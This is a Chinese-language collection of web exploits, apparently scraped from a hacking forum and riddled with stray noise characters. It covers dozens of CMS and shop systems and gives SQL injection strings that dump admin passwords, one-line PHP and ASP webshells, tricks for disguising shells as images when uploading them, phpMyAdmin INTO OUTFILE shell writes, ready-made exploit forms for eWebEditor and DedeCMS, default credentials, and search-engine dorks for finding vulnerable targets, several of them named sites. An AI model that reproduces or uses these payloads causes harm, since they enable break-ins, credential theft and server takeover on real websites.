启航企业建站系统 cookie注入漏洞通杀所有版本
9 {0 J; f5 j) `5 U
7 M* d* }; t4 b/ j直接上exploit: C: q; y+ i1 x/ ^) O4 Y
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));% `, R( V) h) V9 Y
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
9 Q2 O* Q0 l, d# k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 c& l! g! y1 _8 a0 Q% e3 HAsprain论坛 注册用户 上传图片就可拿到webshell. E$ x6 [4 D% O' ~8 Y' X2 y8 W" g" n7 `
$ |2 T' ]% }3 [Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。& d4 D' O- Y5 L1 s. `6 F/ P
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
# w I6 M% v# A% l7 a$ {* E+ O2.gif 为一小图片文件,一定要小,比如qq表情图片
4 v# F" ~! J% h6 W3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
% s8 x7 w; Y# k2 z4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
) H% G* s# H! d5.q.asp;.gif4 m/ a8 K+ }: U' P( K& t
google:Powered by Asprain) m5 L. m+ \( a! X' F/ Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, @6 n7 G6 ^9 K) }7 @* y
/ R I1 ?$ A$ B" R+ a* D3 SShopNum1全部系统存在上传漏洞。+ J1 d& u* y1 x2 n
4 d! i5 g) i, J2 m+ @首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
' w2 v+ L; Y, W" Y& V! W0 T8 c按说明 提示登录后台。。7 e% J" p) h( G; o- h) N) H
在后台功能页面->附件管理->附件列表9 p, D0 D- g! b" }( W6 i
可以直接上传.aspx 后缀木马
8 n$ Q" ?. z, Y- ^8 f k6 H6 W# Fhttp://demo.shopnum1.com/upload/20110720083822500.aspx
; @8 {" R8 g1 ~* r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 f+ I% b6 A$ M. Q4 C5 j3 [- g0 ?1 n& W4 h
牛牛CMS中小企业网站管理系统 上传漏洞* S5 D( m/ [# x Y
! f. H8 c5 J$ y3 D, H牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。9 e$ e7 n9 |' _2 n% v D3 D
后台:admin/login.asp7 u/ [0 R w* f9 [/ X
ewebeditor 5.5 Nday5 W$ d2 ]6 L0 O, Y$ q, }9 K* q
exp:
+ P8 h0 _& i' f0 q<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
- A+ n, n& A0 M<input?type=file?name=uploadfile?size=100><br><br>?
4 B) K& g+ I. ~. ~' \; [4 E1 R<input?type=submit?value=upload>?; g& t0 W8 w! f: p, k8 D/ M! b
</form>
1 G9 x9 Q3 ?1 R' j' b2 Aps:先上传小马.
9 X8 D3 r- U% g. x4 e- }! D- qinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
2 O9 g1 Z- ?# O( S; J3 Q- }! l
3 H N) k3 Y. t6 n- b9 I--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* d" x- R4 O" F* ]2 O4 j4 F+ J! N- T
! r9 E1 V0 s$ ?& D# G
YothCMS 遍历目录漏洞
2 w+ Q) t" B/ d1 {, m* }
' N1 Z7 o, U p8 R优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。, C: P5 e+ ]+ _0 J
默认后台:admin/login.asp
+ ~+ m- a' a. R" e; D r遍历目录:/ |3 C% b& \* _. u" A
ewebeditor/manage/upload.asp?id=1&dir=../
2 I3 _/ Z" k1 @- _8 ^/ q$ Sdata:
! n! O) n2 J3 w% rhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa$ a1 E5 d; E V$ V% b' ~- Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# }5 b+ w; U! [- a5 z j" D; X3 }6 s/ k. O! B) u" X3 x5 v
Net112企业建站系统 1.0. d: E6 h% F) s: g
9 _ @; j! ~; d/ M
源码简介:
6 K- f; K0 f/ M' Y7 [6 `; a& `Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。. W$ W" h# x2 ]1 z4 j G
添加管理员:
0 o1 J9 e% q1 Shttp://www.0855.tv/admin/admin.asp?action=add&level=29 J$ V, B: f: n2 M' B
其实加不加都不是很重要,后台文件都没怎么作验证。
' E% C+ v" `0 P2 b0 n% k) Q ~上传路径:8 ^* S& r$ k, P! u- A* [2 g
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200, S* T9 }) x/ M3 }3 Q
http://www.0855.tv/inc/Upfile.asp?Stype=27 k: R. V0 e9 h
怎么利用自己研究。$ f1 H( z2 T7 G
遍历目录:' R3 M3 W" y# ]/ {$ D6 ^
http://www.0855.tv/admin/upfile.asp?path=../..4 \+ k$ @1 ?, u4 H# e; d1 L
如:4 X0 U d; z* e' c3 I
http://www.0855.tv/admin/upfile.asp?path=../admin3 ]# R W, f& I/ U' b6 x1 G
http://www.0855.tv/admin/upfile.asp?path=../data
3 z1 }, H# W" Q$ J9 C. G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' h2 E+ ` @1 ~6 ]
! K% O/ F1 `: G6 O$ z7 t' H易和阳光购物商城通杀 上传漏洞7 k8 U' V) t& s8 }# ]+ \8 X
8 l8 d U: y3 M, l- e
前提要求是IIS6.0+asp坏境。4 R% o, \8 Y: @0 Z' g/ l( k- w2 I/ q
漏洞文件Iheeo_upfile.asp 7 h8 I% ~* G4 F$ j1 _
过滤不严.直接可以iis6.0上传( H1 `/ ?- a+ ?8 {! D+ N9 P6 f L1 t
把ASP木马改成0855.asp;1.gif; K* a. w" {$ w5 Z. _' L* ?
直接放到明小子上传# U2 L' u8 a! | N
Google搜索:inurl:product.asp?Iheeoid=1 i# B+ H/ o6 M3 ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 E( }) D7 `" }2 N# t# `8 i9 c6 i: T+ ]' z
phpmyadmin后台4种拿shell方法
7 }# c7 g4 K4 i! `5 w! H. R; o0 w& N8 u, W/ ^# O, B" ~, m/ X$ W
方法一:
( {& [( V! `# N% A5 LCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );9 Q- b3 [# d. o* z2 _! j% I* z
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
4 c& C! I. [( I; e6 M6 \9 a* zSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 h3 S' ], J$ p6 y----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
3 L n& G" l7 _一句话连接密码:xiaoma% d& |% Y8 U+ n- k
方法二:! c5 p: M* |+ N+ [" z, ~
Create TABLE xiaoma (xiaoma1 text NOT NULL);0 d" e2 S. l# G; ?4 Z! m
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');8 d& N x' `* @8 _% l
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
! S6 i: [1 t+ ^+ ~& L$ O qDrop TABLE IF EXISTS xiaoma;4 W6 [9 E' d# {; |8 ~
方法三:
5 _ u4 y+ u2 C2 j! n# g) V+ o读取文件内容: select load_file('E:/xamp/www/s.php');
! a: Q9 j' p5 _. x% P& K; [- I写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'+ y4 t4 v8 c) {) N+ L* Z; l
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php', N2 ?- b4 b2 a( Q. t
方法四:% d% j7 F; ~! H: ^( f0 e" B
select load_file('E:/xamp/www/xiaoma.php');2 r, l/ a$ y" A& r0 N
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
* C- k& ~0 K/ D( h" q$ D然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
( r6 |: D+ c8 l. H- X! a( ^; z' [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( q( w" k' ]! K9 b% r: |
! t; `, f% G: v j传信网络独立开发网站源码0day漏洞; H; W' m4 _+ H, t7 w; V. M
* s: f, b, ~9 X, H% o, U& H
后台system/login.asp
) ]9 K8 r( J" \1 W5 i! L3 t进了后台有个ewebeditor
) j; F' l1 {0 R5 R) v+ j- k. aGoogle 搜索inurl:product1.asp?tyc=
" d0 ?0 N/ D) I4 X. U编辑器漏洞默认后台ubbcode/admin_login.asp
" O7 W) [: T# v+ b& }数据库ubbcode/db/ewebeditor.mdb3 h+ Q n5 ]- L0 z1 R! t8 t/ {
默认账号密码yzm 111111
$ | d: }$ `( @; }3 t$ J" Y! U- B* q5 w* L& `4 f; U
拿webshell方法
u# K. [2 X" f0 F登陆后台点击“样式管理”-选择新增样式
+ {( v& ^* r& M1 L# F样式名称:scriptkiddies 随便写
) b) ^+ t8 S+ W, f0 t$ Y路径模式:选择绝对路径 , F5 F' I8 L5 h- Q2 Q* E0 H
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
[8 G- x* e! V$ Q0 G- @7 z1 @图片类型比如就是我们要上传的ASP木马格式5 H1 v# p" ^5 @) u
上传路径:/
' ?1 j2 s- ~/ A, u5 C3 b图片限制:写上1000 免的上不了我们的asp木马* ~$ j0 ?( Y3 ^1 r
上传内容不要写+ o% E8 U' s" \' H
可以提交了
2 O. K3 k9 w% I3 u3 W" {样式增加成功! 9 w e# O- q! q
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 ) K0 X' R2 G3 }! t0 S% f+ N
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置0 R0 ^/ `0 R3 h9 W! n! Z% D' o! g# F
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
: W; Y. ^1 M: O: v0 B4 y上ASP木马 回车 等到路径6 j7 f* p4 X6 q( U0 j
# b: \6 ^, z) Y' B
后台:system/login.asp
7 V0 G! x+ s+ G7 M/ g% q) }$ MExp:5 R Q/ K0 ]; n$ k0 W
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
+ |7 Q* e4 Y5 \+ n( o- z测试:' p3 y; [ H8 j! b9 p
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master9 R" |; {$ X5 L s+ ?
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master) P$ X9 ^( O1 a. N4 C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* |7 N+ u' e: d& U6 K# P+ i* A
+ i- t( ]# W" G2 `
foosun 0day 最新注入漏洞' K& k' W. C( {3 `( p; T/ ]1 A
! ]5 |& }' s+ j& E& z
漏洞文件:www.xxx.com/user/SetNextOptions.asp
7 `7 ~* D% V" f利用简单的方法:
2 e9 r1 B- h, k9 W6 h暴管理员帐号:
2 H# b: B; M: Z; s+ j" _% bhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin V1 A$ {+ G. X$ t# q, V
暴管理员密码:
& U* A; m. B/ t0 H. N2 m+ V# P- {9 vhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
# B4 g; s- c# m1 I7 a" F. x--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 O; P2 J9 L7 X1 f$ s. Z6 d4 }- Q" {$ H9 I4 \
网站程序的版权未知!
' w f4 |* | a) a I" n
( H- S9 w% H6 E+ l. v- o: V3 `+ R默认网站数据库:2 V2 H, L7 K# K( A7 W9 X
www.i0day.com/data/nxnews.mdb7 u# M7 R# Q' k4 }, x1 A& H
ewebeditor 在线编辑器:" W) f1 j: k. v
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
' X9 ^0 J7 u: G) _登录地址:ewebeditor/admin_login.asp4 @+ I' k6 U* D9 @% y9 E
默认密码:admin admin1 R4 P9 U3 Q7 d- p1 G( O( L) h9 Y
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data. N/ l, C; m) _ l3 C$ L
# g; ^; p0 ?5 H$ A* k5 BSql注入漏洞:
9 \6 ?, ]/ [: _http://www.i0day.com/detail.asp?id=12" S, r9 A! M) X8 _5 b
exp:
% D9 C) y/ P. C! q8 O; T7 Runion select 1,admin,password,4,5,6,7,8 from admin9 E; ^7 l; e0 i* b5 B8 X, M8 w9 S
爆出明文帐号/密码
9 C0 p7 ^; Z' w. Q$ f7 E% z8 P$ n) W1 f) p1 `
上传漏洞:
% T- U: s+ J& i3 \, Q* P- Y后台+upfile.asp
3 p: V" C% B0 Y如:
6 n7 ?6 V. r9 ~' zhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。* e8 |# a* J8 z4 r8 t, P
shell的地址:网址+后台+成功上传的马
9 Q- Q8 p4 k& Igoogle:inurl:news.asp?lanmuName=5 S" z, x% p4 \9 r
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 ^4 b2 Q( |6 {2 \6 R* ~ h% L# a$ ^8 O" s2 B# D
dedecms最新0day利用不进后台直接拿WEBSHELL- ?. q' E- R% U" {* d- M
3 g; p# \0 a2 @8 J
拿webshell的方法如下:
1 h7 _7 j5 N. ?% C网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.4 G: {/ A1 O+ x
前题条件,必须准备好自己的dede数据库,然后插入数据:& S, N' v2 W: G8 A, L% w
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
) b7 X" _ e: U; S4 d# V3 S$ p" U* Z) m9 {8 V' d
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
' p/ ~. q1 [( p<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">& W% \. i4 S& V5 F5 S ^8 q
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ q; d! N3 [; O! D) A
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
. I$ f" R, q b( [/ {<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
: a$ Q. n7 K/ g! W<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
+ d: [9 J5 G8 M5 |<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ D% ]( a) J# h2 V! J<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
( @" }0 ?: @3 q+ n1 T, j) Z( O<input type="text" value="true" name="nocache" style="width:400">6 s$ A: p3 X$ M7 ~$ h% l
<input type="submit" value="提交" name="QuickSearchBtn"><br />$ a% r5 G+ i) B* F
</form>
% u5 W9 @; Y* M7 [# Q: ~<script>
% q) P7 g) A, l, d. \1 rfunction addaction()! y% j0 C0 H% u1 p7 t0 \( e$ ~
{! F+ ] f" h2 J9 L5 D! t
document.QuickSearch.action=document.QuickSearch.doaction.value;
+ p" o ~( I7 z. K/ U# C6 s}) C$ L6 _ i4 P6 o$ h
</script>! y( f G+ z: U0 `% X2 C6 r8 Z8 M
-----------------------------------------------------------------------------------------------------------------------------------------------$ N0 F! b% n5 O6 {
6 J9 W/ c0 g( m9 ^
dedecms织梦暴最新严重0day漏洞
5 }9 F, ?9 {; E4 \+ Z! X% c0 abug被利用步骤如下:! t: ~+ g% W8 n2 a4 C. i
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
4 c7 v+ _, x u7 j; F; v+ K4 x& C% m把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
- _/ L0 V( R" {) W5 ?( m-------------------------------------------------------------------------------------------------------------------------------------------2 l1 p% y# U; |) n
2 w1 w/ C, Q& T& b# M$ D! O多多淘宝客程序上传漏洞 " b: k: R3 r/ L8 _3 X7 R7 n1 `
漏洞页面:/ z) ]4 E! c1 H1 a8 C- p
admin\upload_pic.php9 a. j5 Q9 j* ~
传送门:! r3 R+ g. F6 D+ q2 L) ]
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
& y8 h) t W( s# Y0 uPS:copy张图片马 直接 xxx.php 上传抓包地址!2 _7 @0 V# F0 D$ ~! i- l
------------------------------------------------------------------------------------------------------------------------------------------------------
$ W- ]$ i3 b" E2 k' s% t
& ?2 ?, A8 l" S% O8 U8 j: D. R& D无忧公司系统ASP专业版后台上传漏洞; J5 R! _# l9 p: E: ^" O% x
漏洞文件 后台上传
5 z$ V% A# Z) ]. f, x% Q3 Sadmin/uploadPic.asp
; }$ w/ Q# [. N# y S4 |2 K漏洞利用 这个漏洞好像是雷池的' b7 u' ^/ A7 [7 X& `( ~4 h) u! p) o
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=12 I' s# w* E$ x% h6 H+ T7 K
等到的webshell路径:
0 w. c$ o ?3 }8 Q: z% ~- o/UploadFiles/scriptkiddies.asp;_2.gif
( F4 g! K$ j3 C% i& {0 x F% h0 Q---------------------------------------------------------------------------------------------------------------------------------------------------
. ]: }, ?1 z/ N) G: F% \2 Y0 W# w" Y# n) F1 Y. c
住哪酒店分销联盟系统2010# v+ z9 O& z) B6 q4 x4 }
Search:. `3 Z. g! N6 N0 H$ W0 G
inurl:index.php?m=hotelinfo: p* w& p" T# j- r9 E1 Y4 [1 A. }
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin8 a, p: `. x6 C; G
默认后台:index.php?m=admin/login. X0 H+ L1 D. L4 X6 ^- O: ~ n. r
--------------------------------------------------------------------------------------------------------------------------------------------------) A% D, H$ O# c/ E
8 ], w2 |# o' F: }& U& f2 n" tinurl:info_Print.asp?ArticleID=& @0 V4 E3 V- y3 }, L. [; L
后台 ad_login.asp0 e5 q* d& k: {
爆管理员密码:
! ^1 R2 x9 Z6 m+ B- x) A" punion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin3 t8 d8 `, t% V( k2 A$ Y' l! b
------------------------------------------------------------------------------------------------------------------------------------------------------------
) @6 P( }3 p/ r1 S* n
6 c9 Q, W; P6 i8 Y6 W搜索框漏洞!
; f# T0 u T! Q. ~6 r# a$ h6 N%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='7 G/ c3 L' O1 Q7 ^$ Y$ m5 W
--------------------------------------------------------------------------------------------------------------------------------------------------------2 n$ v( q0 t$ i: m6 l
$ ?8 \+ @$ p4 q' C) V关键字:# _8 x" \! Y1 m5 a8 ?: U i1 S
inurl:/reg_TemletSel.asp?step=2
, Q% f1 R5 Y' O8 b& |或者
5 S" \, t' h! Y) d电子商务自助建站--您理想的助手9 |9 A; |4 l% v/ u
-------------------------------------------------------------------------------------------------------------------------------------------------
2 ~ S! N3 O9 d! v6 p1 S8 T) j' W6 b6 y% }: C. C4 O
iGiveTest 2.1.0注入漏洞
# b6 a2 c k) ?9 lVersion: <= 2.1.0& H1 V* u1 z4 T2 }: |$ f
# Homepage: http://iGiveTest.com/4 {2 ? h- ~1 R+ D. v& z' r
谷歌关键字: “Powered by iGiveTest”
) \4 Z' e2 C% P随便注册一个帐号。然后暴管理员帐号和密码; R1 p+ P, E; R! t" |" }
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (16 N0 G8 p$ P3 ~% Y% K' J
------------------------------------------------------------------------------------------------------------------------------------------------/ O3 w i7 I: l- Q' \0 v
# c+ h1 `. u( l( NCKXP网上书店注入漏洞5 |' E+ d5 ]8 H
工具加表:shop_admin 加字段:admin
! K6 `2 p8 y! E" g* Q后台:admin/login.asp " g: d) _) y, C8 x$ v0 Y9 g* V# Y2 `
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
( N9 v3 c6 @0 E! T& X2 l* Q, s, e8 Vinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息6 s+ h: g! l, i6 E7 ~, i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 Y7 d2 n8 S K& v
" c r$ h" H4 H7 [段富超个人网站系统留言本写马漏洞
( }# M6 n( D4 H" ^$ f7 x源码下载:http://www.mycodes.net/24/2149.htm9 _7 L7 P* C: b, h" c2 L
addgbook.asp 提交一句话。
4 m( _7 s. N' u% O7 L+ Z* b& h( S连接: http://www.xxxx.tv/date/date3f.asp7 K4 r. ^6 I; C# z
google:为防批量,特略!$ S# x4 a7 X! E) d& F
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* g5 k* {5 I9 X6 |4 w: \' t# }9 k" d
7 I* u9 Q9 I6 s3 B5 A, A. e% t智有道专业旅游系统v1.0 注入及列目录漏洞
8 H+ R1 H3 J4 f3 s- d0 U5 W默认后台路径:/admin/login.asp+ k% t9 j+ c; o8 z& W: n/ `' T$ g
默认管理员:admin
1 t2 I/ n- t- z3 `% ]4 [ ~( T默认密码:123456
$ I n1 _0 ?- jSQL EXP Tset:0 Z; }" R7 c7 a
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin% o- K, y7 t4 X/ B. e' A
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 I: Y; o7 ^5 p- x$ Y. _
# Y! G! Q. ~0 W$ d' ^) Sewebeditor(PHP) Ver 3.8 本任意文件上传0day5 l4 Q$ Q; ~' o$ S8 R' n" g
EXP:
& y) h% g* E8 {( `$ m* }! {<title>eWebeditoR3.8 for php任意文件上EXP</title>4 j7 t, o/ H3 C& n% ^
<form action="" method=post enctype="multip& F, u3 _4 R: `. p
art/form-data"> ) V# }- y$ U8 A
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
( N! w3 P2 b' O: R# D: x3 d) GURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 2 a* d% s8 p c5 o* V8 M3 P) x- b
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ' P# `" `, x+ I. ^% [
file:<input type=file name="uploadfile"><br> 1 B+ g7 s% w. v" d
<input type=button value=submit onclick=fsubmit()> # A1 h0 H) p/ [) Q+ V7 `! W2 L
</form><br> ) C/ L4 W5 e/ X6 [$ g" [& J
<script>
2 X8 p% h4 b, n/ o0 Xfunction fsubmit(){ 4 p* P) g* n) g! V) ?- E( u! M
form = document.forms[0];
. J) e+ h7 q r; Y. G* k+ Bform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
7 d$ x0 e" f+ e! {alert(form.action); k( \4 d7 m, d8 _
form.submit(); ! S1 e, H# |5 n9 Z3 S/ U
}
7 S( Q5 `/ E. J9 V7 i$ _' @4 y</script>
1 T- ?% y' e' e- b注意修改里面ewebeditor的名称还有路径。
# h' L7 {/ N. }' \$ n$ u8 e---------------------------------------------------------------------------------------------------------------------------------------------------------------------------% J+ v6 b+ x [5 I ?* l
) {# K# a2 K2 Y0 B* E3 D% ~* w提交’时提示ip被记录 防注入系统的利用
) X; D# F3 W& m. C5 j, [网址:http://www.xxx.com/newslist.asp?id=122′
* h* j+ J4 i, m0 P- A提示“你的操作已被记录!”等信息。) ]: Y) w) A) H
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。5 W6 ^& W5 ?9 ]0 s6 ?- t9 M8 G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 {# V0 ~$ i; [. l$ g- h1 _ `; u0 M! l3 T* y
西部商务网站管理系统 批量拿shell-0day
8 c s p8 V- C: W这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb , Y' v0 B0 @# \$ G4 @% z" M
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛" J; }$ [* E2 U
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合' ~( X) Q/ {9 o! ?- Z3 w
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
) y2 V' R, e$ e; A. D0 M---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% G' [7 j' I X5 m7 a$ U; e% p0 [; I
JspRun!6.0 论坛管理后台注入漏洞
% X7 {4 F: Z0 C/ k# u; @) c; r: p; Y& h# J6 ~% ^
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:! K) n, o& Z, Y: V! G- K9 A; H3 I
JspRun!6.0 - X9 _' I; V& Y3 _
漏洞描述:
0 w! N% n" Y( h/ d: ?- UJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
) c& t6 H, N) S8 c在处理后台提交的文件中ForumManageAction.java第1940行& I- P9 w/ l6 a/ E- J" B5 R
String export = request.getParameter("export");//直接获取,没有安全过滤
; s" P6 b& X P% Dif(export!=null){
* m9 \+ e; A& J, O* V' ZList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了.... N2 {1 @$ G1 h$ ^
if(styles==null||styles.size()==0){% v; }. G' W& Y; P6 i$ J4 |8 h
<*参考6 _; V! l+ w9 Z% q% J5 T( x
nuanfan@gmail.com' P: }$ v7 d$ |' G3 {2 J2 J
*> SEBUG安全建议:6 [ q0 r$ `: J" I2 A# j% p4 t
www.jsprun.net- c0 s% |# H" W+ Q4 J& V
(1)安全过滤变量export" s; f# L" r0 Y. s M4 P. x
(2)在查询语句中使用占位符4 n. T4 x( `8 V2 W) y# K
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# u3 z' t) v8 X
" k( b2 @ c- C4 g/ D3 L乌邦图企业网站系统 cookies 注入) x' ]0 o, u2 j
' u/ ^' W( {: O* `# a: M7 `
程序完整登陆后台:/admin/login.asp. _8 n n7 h9 x' z3 j7 x
默认登陆帐号:admin 密码:admin8880 g P8 z3 t) ^4 F3 i$ ?# l
语句:(前面加个空格)2 G5 @3 h4 O# x* A( a1 ?9 R
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin( V2 M& x5 R1 L3 ~* T- O M
或者是16个字段:
6 G) C* n5 b5 T3 u- u! S, ^and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin- j, Z5 B0 R) k2 C% l! A0 n
爆不出来自己猜字段。
% i" ?8 d' S; K1 f注入点:http://www.untnt.com/shownews.asp?=88
$ ~* p5 V- i/ J) H" z( sgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
) |) i$ [; D6 l7 B- X8 @关键字:2 f7 o {/ i! v
inurl:shownews?asp.id=7 e3 F. |; U, X' m/ f
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 V$ u K( C- |: Q$ U& |# b. G
: u0 [" a" o/ z( p) S0 R% DCKXP网上书店注入漏洞% P0 R+ y$ g2 x1 U" m
% X( m6 C5 j1 ~( s" X2 u7 C
工具加表:shop_admin 加字段:admin7 Z+ R: h6 R- k) y; w6 J+ P
后台:admin/login.asp ! Q2 ~: k4 B* Z$ _+ F
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
$ H" {6 n, O6 q! Y3 b0 i) p& kinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息! F4 o, j# Q5 P8 N7 V m
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------" M/ z3 X* `6 ^5 O: F. ?2 E
8 S, C1 n( @6 g) Z' C
YxShop易想购物商城4.7.1版本任意文件上传漏洞
2 }! P1 a" G, U- @7 t. g2 h
